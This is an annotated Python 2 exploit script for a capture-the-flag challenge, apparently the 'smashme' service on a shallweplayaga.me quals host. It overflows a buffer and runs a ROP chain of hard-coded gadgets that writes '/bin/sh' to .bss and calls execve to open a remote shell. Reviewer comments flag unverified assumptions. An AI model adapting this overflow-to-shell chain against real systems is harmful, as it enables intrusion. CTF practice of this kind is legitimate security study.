from m1z0r3 import *
# NOTE(review): m1z0r3 is a personal helper library that is not on this page.
# sock(), p64() and shell() are assumed to be the usual pwn helpers
# (sock -> (socket, file-like), p64 -> 8-byte little-endian packing,
# shell -> interactive relay on the socket) — confirm against the library.
# The script is Python 2 style: p64() output is concatenated with plain str.
HOST = "smashme_omgbabysfirst.quals.shallweplayaga.me"
PORT = 57348
# Text the target expects at the start of the input, followed by the padding
# that reaches the saved return address. offset = 33 is the author's value;
# nothing on this page lets it be re-derived.
prefix = "Smash me outside, how bout dAAAAAAAAAAA"
offset = 33
s,f = sock(HOST,PORT)
# Gadget addresses in the target binary, as found by the author (the binary
# itself is not on this page, so they cannot be checked here).
addr_pop_rdi = 0x004014d6 # pop rdi;
addr_pop_rdx = 0x00441e46 # pop rdx;
addr_pop_rsi = 0x004015f7 # pop rsi;
addr_syscall = 0x00466815 # syscall;
addr_xor_rax = 0x0042564f # xor rax rax;
addr_mov_rdi_rdx = 0x434a43 # mov [rdi] rdx;
addr_lea_rax_f = 0x43a43e # lea rax [rdx+0x0F];
addr_add_rax_3 = 0x465ce0 # add rax 0x003;
addr_add_rax_2 = 0x465cc7 # add rax 0x02;
# Author's scratch plan for the chain; a bare string expression, never
# executed. It differs from the code below in two places: `mv` is a typo for
# `mov`, and it uses bss_addr + 0x200 where the code uses bss_addr + 0x100.
"""
# rax = 59
xor rax rax;
lea rax [rdx+0x0F]; # rax = 51
add rax 0x3;
add rax 0x3;
add rax 0x2;
# rdx = 0
pop rdx;
0
# rsi = {rdi,rdx}
pop rdi;
bss_addr + 0x200;
pop rdx;
bss_addr
mov [rdi] rdx;
pop rsi;
bss_addr + 0x200;
# rdi = * "/bin/sh"
pop rdi;
bss_addr;
pop rdx;
"/bin/sh"
mv [rdi] rdx;
syscall;
"""
# Writable scratch area used for the string and the pointer array.
# presumably 0x6cab60 is the start of .bss (from the name) — verify.
bss_addr = 0x6cab60 + 0x100
buf = prefix
buf += "A" * offset
# rax = 59
# No direct `pop rax` gadget is used; rax is built as 0 -> rdx+0xF -> +3 +3 +2.
# The lea reads rdx, so this only reaches 59 if rdx is 0x24 (36) when the
# chain starts. The author's "rax = 51" comment asserts that; nothing on this
# page shows where rdx's value comes from — TODO confirm.
buf += p64(addr_xor_rax)
buf += p64(addr_lea_rax_f)
buf += p64(addr_add_rax_3)
buf += p64(addr_add_rax_3)
buf += p64(addr_add_rax_2)
# rsi = {rdi,NULL}
# Stores bss_addr at [bss_addr+0x100] and points rsi at that slot, i.e. the
# pointer array's first entry. The chain never writes the terminating NULL at
# bss_addr+0x108; it relies on that memory already being zero — confirm.
buf += p64(addr_pop_rdi)
buf += p64(bss_addr+0x100)
buf += p64(addr_pop_rdx)
buf += p64(bss_addr)
buf += p64(addr_mov_rdi_rdx)
buf += p64(addr_pop_rsi)
buf += p64(bss_addr+0x100)
# rdi = /bin/sh
# The 8-byte string literal (7 chars + NUL) is popped into rdx as an
# immediate and stored at [bss_addr]; rdi keeps pointing at it.
buf += p64(addr_pop_rdi)
buf += p64(bss_addr)
buf += p64(addr_pop_rdx)
buf += "/bin/sh\x00"
buf += p64(addr_mov_rdi_rdx)
# rdx = 0
# Zeroed only after the lea above consumed the original rdx.
buf += p64(addr_pop_rdx)
buf += p64(0)
# syscall
buf += p64(addr_syscall)
# Trailing newline presumably ends the target's line read — confirm.
s.send(buf+"\n")
shell(s)